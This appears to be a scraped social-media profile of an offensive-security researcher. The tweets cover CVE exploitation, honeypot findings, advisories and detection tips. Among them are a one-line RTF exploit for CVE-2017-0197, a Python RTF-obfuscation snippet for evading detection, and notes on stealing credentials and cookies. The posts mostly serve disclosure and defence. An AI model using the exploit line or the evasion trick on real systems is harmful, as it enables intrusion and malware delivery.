Rich Warren
@buffaloverflow
Followers
10,546
Following
665
Media
271
Statuses
1,531
Red Team & Offensive Security Research @AmberWolfSec
Joined May 2011
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
LINGORM CHARMING RISING COUPLE
• 1021173 Tweets
Derrick Rose
• 86249 Tweets
#大感想大発表
• 39893 Tweets
カレンダー
• 36532 Tweets
D Rose
• 31990 Tweets
VLOG 13 WITH BUILD
• 31159 Tweets
#モニタリング
• 23730 Tweets
#素のまんま
• 23411 Tweets
CS進出
• 14962 Tweets
#ケンミンショー
• 13958 Tweets
高校生の手紙
• 13560 Tweets
CS決定
• 10484 Tweets
Pinned Tweet
Okay, I signed up for Mastodon. You can find me here:
0
0
11
My dog just carried out a Denial of Service attack against me. Ate my Bitlocker key and bit the end off my Yubikey. That was not in my threat model 🤯
27
377
1K
Missed this, but last week someone exploited my Exchange server with proxylogon and then patched it via the webshell 😆
20
266
1K
Popping calc with CVE-2021-40444 (MS Office exploit)
Thanks to
@BouncyHat
for collaborating 😀
Not planning to release but my bet is with itw exploits, it won't be long..
19
309
872
Cobalt Strike CVE-2022-39197. Quite easy to repro from the release notes.
Red Teamers, patch your Team Servers 🙂
14
174
591
Ok, we are seeing active exploitation of CVE-2020-5902
Patch it today
7
260
586
.NET exploit for Zerologon is now released 🥳
Identify and exploit vulnerable DCs using execute-assembly, no python required
Includes detection tips for each step of the exploit chain. PRs accepted for more detections! 🙏
Go find those DCs and patch!
Zerologon (CVE-2020-1472) in .NET for some execute-assembly fun.. muahaha 👿😄
3
149
413
7
299
578
We found an RCE vulnerability in the Citrix Workspace & Receiver clients. It can be triggered through the browser simply by visiting a malicious website. No need to log into a rogue Citrix server.. Fix has now been released.
9
297
527
0-Domain Admin in 10 seconds with Zerologon (CVE-2020-1472)
Using
@_dirkjan
's NetrServerPasswordSet2 commit to impacket 😀🥳
9
203
527
CVE-2019-19781 post-exploitation notes:
If you are seeing attackers reading your /flash/nsconfig/ns.conf file then you need to change all passwords. The SHA512 passwords are easily crackable with hashcat.
8
174
422
CVE-2019-11542 is a nice (post-auth) stack buffer overflow in Pulse Secure VPN.
❌ no ASLR
❌ no NX
✅ remote root
great find by
@orange_8361
&
@mehqq_
5
154
417
Zerologon (CVE-2020-1472) in .NET for some execute-assembly fun.. muahaha 👿😄
3
149
413
Wow, this broke a lot of people's lateral movement. Good job MSFT! Now is a fun time for WMI research.
11
162
383
In case you were wondering about CVE-2019-11539, here is a video showing how you can get a root shell on the Pulse VPN appliance.
4
116
319
I reproduced the full chain of Ivanti Connect Secure CVE-2023-46805 (auth bypass) + CVE-2024-21887 (RCE) 🥳
While it is mentioned in the advisory, it's worth noting that 21887 is multiple command injection vulns under one CVE. I counted 5 before I got bored looking 😆
not sure that its the same post-auth as the itw pulse secure exploit, but its *an* RCE 😛
Still need an auth bypass ..
3
9
67
7
80
305
Here is a CNA script for abusing the print spooler named pipe impersonation trick by
@itm4n
Useful to get SYSTEM with only SeImpersonatePrivilege and can be used as an alternative to getsystem.
Came in handy recently and wanted to share the ❤️
3
123
301
Just published advisories for Pulse Connect Secure CVE-2020-8260 and CVE-2020-8255. Auth file read and auth RCE.
Documenting some new RCE techniques for arbitrary file write on PCS with
@johnnyspandex
1
148
296
Releasing PyBeacon. A collection of scripts for dealing with Cobalt Strike beacons in Python.
Covers:
- staging
- asymmetric encryption and metadata parsing
- symmetric encryption (tasks) and decoding
- beacon registration
- beacon callbacks
3
120
280
Here is the advisory for CVE-2021-21518, which is a Local Privilege Escalation vulnerability I found in Dell SupportAssist
9
96
246
Added support for SMB2 snapshot listing/browsing/downloading to impacket. Cool feature for dumping NTDS etc. over pure SMB
1
116
246
Here is the advisory for CVE-2021-22937, which is a patch bypass of CVE-2020-8260 (Pulse Connect Secure RCE)
6
108
240
Cool little persistence trick on Windows 10 (abusing OneDrive.exe)
2
156
234
Confirming SandboxEscaper's latest AppXSvc LPE (aka CVE-2019-0841-BYPASS) is indeed a 0day and works up to the latest 1903 build (but no collector abuse anymore 😢) . Weaponised demo on 1809..
4
108
226
I was curious if it was possible to exploit CVE-2017-8570 (aka composite moniker) using Packager. Looks like it works nicely :D
4
124
209
Wrote a .NET exploit for CVE-2019-0841. h/t
@rogue_kdc
for vuln &
@ryHanson
for exploitation vector 🙏
4
98
202
Had a lot of fun this weekend working on exploiting Exchange with
@BouncyHat
and
@amlweems
. Between us we managed to get the full RCE chain working on a single server environment 🎉
9
54
209
Here is an example showing how to do named pipe IPC in Cobalt Strike. Useful for getting output from (self)injected ReflectiveDlls.
CS 4.1 bofs sound like they will solve this problem, but maybe still useful 👍
4
82
195
btw, it's not just CVE-2021-40444 that this trick is useful for. For example, it works for other RTF-based vectors too, e.g.
Not sure if Microsoft fixed this (my VM is unpatched). But it works in explorer preview mode via RTF:
7
49
177
0
61
196
Here is the advisory for CVE-2019-11114, a Local Privilege Escalation vulnerability I found in Intel DSA. If you have an Intel based machine, double check if it's installed and update if required 👍
1
106
195
Windows 11 (May) + Office Pro Plus (April)
+ Preview pane enabled
5
66
197
Exploit for
@itm4n
's CVE-2020-0863, with this beautiful trick by
@jonasLyk
to turn it into arbitrary file write 🤩🤯
See:
Thanks for sharing, both! 🙏
@itm4n
I made it into EOP by making a mount point targetting \\.\pipe\ , then creating a named pipe with the name ..\..\something.xml , the dir listing thinks ..\ is part of the filename, so the copy goes outside the intended dir, where I had a symbolic link ready :)
3
3
43
2
73
191
FWIW, I had backups. Everything is fine. Dog was just testing my disaster recovery. Good dog.
1
13
184
Today we release our blog post that demonstrates a new single request exploit for CVE-2019-19781 that is effective even if all of the "vulnerable" Perl files have been deleted 🙀
We also share stats on devices that are patched but still contain backdoors
7
103
184
Had fun today writing a .NET exploit for
@itm4n
's CVE-2020-0787 BITS LPE and UsoLoader technique.
Check out his blog posts and research if you haven't already. They are all brilliant 👏🙏
3
75
182
Not sure if Microsoft fixed this (my VM is unpatched). But it works in explorer preview mode via RTF:
Popping calc with CVE-2021-40444 (MS Office exploit)
Thanks to
@BouncyHat
for collaborating 😀
Not planning to release but my bet is with itw exploits, it won't be long..
19
309
872
7
49
177
Build events aren't the only way to backdoor a Visual Studio project.
@StanHacked
documented some other interesting ways in his awesome "COMpromise" research:
TypeLibs are another sneaky way to gain code execution. Yara rule:
2
71
174
Turns out it was an 0day at the time! Sample is CVE-2018-0802 😵
"Fw_ Invitation letter of FW review meeting.rtf"
sha256 81c733c0bae854e280d0d3c2e7ff1fdcd0f1eef2a653286a641437dcea21f409
#Malware
using Word add-in persistence
Sample uses the CVE-2017-11882 %temp% dropper method to %APPDATA%\Microsoft\word\startup\w.wll
@MalwareParty
#infosec
1
29
47
1
72
156
Running a Cobalt Strike beacon at WinTCB PPL using a .NET port of PPLDump by
@itm4n
😍
Waiting for EDR to mem scan me 😴
5
39
156
On CVE-2021-22986 (F5 iControl REST RCE)..
This is a great writeup. I've also been looking at this in my spare time and have finally got the full RCE chain working 🚀
Props to
@wvuuuuuuuuuuuuu
for the awesome notes which helped confirm I was going down the right rabbitholes! 🙏
Writeup has been updated with full details, including IOCs for defenders. The SSRF vector is still developing. I'll upload more code in a bit. 😩
2
25
51
3
52
154
Thanks to
@_jsoo_
for his idea, here is a fun way to exploit CVE-2017-8759 via CSV in Excel. One line exploits ftw 😂
3
82
150
CVE-2021-22900 (Pulse Secure authenticated RCE), is just a variant of CVE-2020-8260
2
40
152
Got the ProxyShell exploit by
@orange_8361
working. That was fun 😃
Thanks Orange for the amazing research, and also to
@peterjson
and
@testanull
for their detailed blog post 🙏
2
26
147
This creative, obfuscated RTF doc exploits Equation Editor 7(!) times to write out b64 file to %tmp%, then decodes /w certutil and executes .bat. Loads remote HTA from RFC1918 address. Malware testing? Red Team? 🤷♂️ Fun though 😋
7
76
145
Today's RTF obfuscation trick:
obj = "010500000200"
s = ""
for x,y in zip(obj[::2], obj[1::2]):
s += "%s%s\\'%s" % (x+y, randint(0, 9), os.urandom(1).encode('hex'))
print s
2
62
144
Just realised the exploit for CVE-2017-0197 (Office 2010) fits exactly in one tweet 😁 /cc
@yorickkoster
{\rt\object\objocx{\objdata 0105000002000000160000004f6e654e6f74654d6f62696c652e53706e53796e6300000000000000000001000000410105000000000000}}
1
15
22
0
69
144
In personal news, I no longer work for NCC Group. I’m taking some time out, but hopefully will announce something exciting in the near future. Until then I’ll be playing video games, working on my old VW and breaking my one rule of staying away from computers 👾🥳😎
24
3
140
🚨 CVE-2019-11510 under active exploitation 🚨
From: 185.25.51[.]58
Exploiting the recent Pulse Secure SSL VPN arbitrary file download vulnerability to extract cleartext passwords and hashes.
FWIW this honeypot was online for ~48 hrs. If you have an unpatched VPN, patch quick
3
86
131
Some Friday fun: cabinet directory traversal (CVE-2021-40444?) can be used for non-office/IE exploits too .. 😀
3
33
123
Exploit for Citrix NetScaler CVE-2019-19781. Very interesting bug(s)!
'touch /tmp/CVE-2019-19781' because I'm lazy/busy 😉
1
28
122
Quick scanner to check your Pulse Secure VPN versions. You can use it to detect if your server is vulnerable to CVE-2019-11510 and others.
4
36
123
I wrote an exploit for CVE-2017-11882 that uses Packager.dll to drop+exec (as seen itw by
@MalwareParty
+
@HaifeiLi
). Maybe it's useful if you don't wanna use webdav.
1
80
122
I added a write up of this exploit along with some details of the patch and
#Yara
detection rules here
CVE-2017-8759 exploited in PowerPoint (just for some fun) :D
1
16
53
3
77
118
Print Your Shell: A great article (from 2009) about some of the issues of point-and-print and exploiting the Windows print spooler 🖨🐚
1
45
116
Got the
#ProxyNotShell
RCE exploit working. Pretty cool set of bugs! Just need to figure out how to hit the sink from low priv (I have an idea 👻)
4
21
112
Another good thing to look out for, is webshells saved as attachments in people's mailboxes. They are encoded, but can be decoded with this simple script:
#ProxyShell
3
39
114
Starting to see itw exploits for CVE-2018-20250 (WinRAR) now.
2
55
107
Finally had some time today to write something I've wanted every time I need to dump cookies.. 🍪
Just extract masterkey once, download the Cookie file and import 🪄
11
25
109
Why can my SSL VPN appliance run a bitcoin miner, but not EDR? 🤔
We're seeing more than just scanning for the recent pair of Ivanti Connect Secure vulnerabilities (CVE-2023-46805 and CVE-2024-21887) - we're seeing real exploitation attempts - this one installs a Bitcoin miner! Patch your hosts ASAP!
3
47
126
5
27
105
If you are wanting to develop Cobalt Strike bofs in Visual Studio, this template might be useful for you:
It can probably be improved with some better compiler flag combos, but a good starter if like me you prefer working in VS 👍
1
41
105
Hmm seems like not everyone understood. This is a honeypot. Im not outsourcing my patching to randoms on the internet 😂
Of course their intentions were bad. They did it on multiple servers and left their webshells there for persistence
1
3
98
3 months of honeypot data related to F5 (& a small amount of Citrix) exploitation released today
Includes:
✅ PCAP of all web traffic
✅ IDS Rules for mitigation F5 bypass
✅ Interesting findings and stats
✅ A pretty cool webshell
Dive into the data and see what you can find!
Blog: We have released three months of honeypot web traffic data related to the F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 exploitation events from earlier this year - insights and intel on Iran and others -
1
51
103
1
46
96
RE: CVE-2019-19781 detections (Citrix NetScaler/ADC RCE)
Although the vulnerable code mandates the the first request *must* be a POST request - the second request can be a HEAD or even a PUT and will still get processed by the template engine.
1
36
94
The Chlonium repo is now public, and now supports additional Chromium-based browsers such as Edge and Vivaldi, thanks to
@dtmsecurity
's suggestion! 🙏
Finally had some time today to write something I've wanted every time I need to dump cookies.. 🍪
Just extract masterkey once, download the Cookie file and import 🪄
11
25
109
2
48
96
ZScaler has published an advisory for CVE-2020-11635, an LPE vulnerability reported by myself and others. It is fixed on client connector versions 3.1.0 and upwards 🙂
5
33
91
Some attempts itw on CVE-2021-20038 (SonicWall SMA RCE). Also some password spraying of default passwords from the past few days
Remember to update AND change default passwords :)
6
30
81
Hash for this sample was:
CVE-2018-8174 IE
#0day
. Great analysis here:
Today's RTF obfuscation trick:
obj = "010500000200"
s = ""
for x,y in zip(obj[::2], obj[1::2]):
s += "%s%s\\'%s" % (x+y, randint(0, 9), os.urandom(1).encode('hex'))
print s
2
62
144
2
59
85
Wow, interesting sample.. I think I count 3 exploits (CVE-2017-11882, CVE-2018-0802, CVE-2017-8570). Wins 🏅4 noisiest sample 4sure! 😂 Looks like its dropping
#remcos
12/57 on VT.
@anyrun_app
working nice 👍
5
36
83
A new blog post I am working on. Can you guess what it does? 🤫😉
6
9
82
I went to check for these IOCs on my Exchange honeypot, but instead of finding APT, all I got was this lousy Zeppelin ransomware note 😅
And all my files were indeed encrypted, including the webshells (oops!)
ProxyShell continues to be a trash fire
3
12
83
I mentioned this before but didn't try it. It works 👍
dropper.rtf -> load doc from webdav -> serve correct macro stripped doc for detected office ver
Problem:
Background:
@malcomvetter
@JohnLaTwC
@ItsReallyNick
@Mao_Ware
@VessOnSecurity
True. You mean the differences in office versions? I think that could be solved by using an intermediate doc with ole2link to remote (macro)doc. The server then serves correct version based on user agent. Could be a fun one to try :)
0
0
2
2
38
81
Here's an MHT version (saved as .doc) to break your Yara rules 😈
You can easily see the URL Moniker within the XML
Windows 11 (May) + Office Pro Plus (April)
+ Preview pane enabled
5
66
197
5
42
77
If you see the attacker reading /var/nstmp/sess_* then they just stole authenticated cookies which can be re-used
1
21
73
Detection: Exploited with 1 POST + 1 GET reqest. As mentioned before, you can look for "/vpns/" in the path, but also "../" in header values for the POST. Probably shouldn't say *which* header at this point. This will be followed by a GET request for a file ending in ".xml".
Exploit for Citrix NetScaler CVE-2019-19781. Very interesting bug(s)!
'touch /tmp/CVE-2019-19781' because I'm lazy/busy 😉
1
28
122
2
18
72
Adding some new features to our internal inline-execute-assembly BOF :D
Safety first!
4
19
72
I’ve not looked at the exchange bugs yet but my speculation is that because MS never fixed the path confusion of proxyshell (just stopped sending auth to the backend), that this same path can be used to send your own auth or attack another unauth backend svc
3
12
69
Useful to know: the tool works on a default domain-joined firewall config without the need for admin
How?
We used a technique from
@NinjaParanoid
to make use of http.sys with default allowed URL ACLs / firewall rules
Worth blocking these if not needed
1
21
71
Ok AES-256 encrypted LDAP passwords in ns.conf in ADC/NetScaler have been broken. You need to change those too.
@buffaloverflow
@n0x08
just looked at that, the new key is right there too :) just switched to aes256-cbc , see
2
8
25
1
43
71
Threadkit seems to have a new CVE-2018-4878 exploit, or at least I've not seen it before. Is this new?
4
41
69
Diaghub is one way, but abusing trigger-start services can be a fun method to exploit arbitrary file writes too. ETW, COM, RPC. Lots to dig into!
4
15
69
The Pulse Secure integrity checker contains hashes for a load of different PCS firmware versions. This can be used to build a passive version fingerprint
2
22
70
3
30
66
Oh what do we have here? An updated "Word Silent Exploit Builder" appears. Complete with stolen exploit code.
@ItsReallyNick
this is where your 15 character-name SCT files are coming from 🙃
Cracked? ✅
Backdoored? 🤷♀️
3
21
66
If you are looking for the decrypted SWF for CVE-2018-5002, the full hash is:
f63a51e78116bebfa1780736d343c9eb
5
40
67
not sure that its the same post-auth as the itw pulse secure exploit, but its *an* RCE 😛
Still need an auth bypass ..
3
9
67
They are using this exploit. I guess you get what you pay for 😋
Once they drop the follow-up webshell, they delete the first. Might be a race condition if they delete it too early. Not going to debug it for them though! 😂
0
12
66
Time to patch those pulses again!
Fix for CVE-2020-8243 is out, which is an authenticated RCE in template toolkit (sound familiar?) 😉
0
26
65
Pushed a small update to Chlonium to support offline statekey decryption using
@harmj0y
's excellent SharpDPAPI project
Supports decryption with a domain backup key or user's password 👍
0
18
66
Confirmed Sonicwall 0day + indiscriminate ITW exploitation 👀
Per the
@SonicWall
advisory - - we've identified and demonstrated exploitability of a possible candidate for the vulnerability described and sent details to SonicWall - we've also seen indication of indiscriminate use of an exploit in the wild - check logs
6
43
80
1
29
59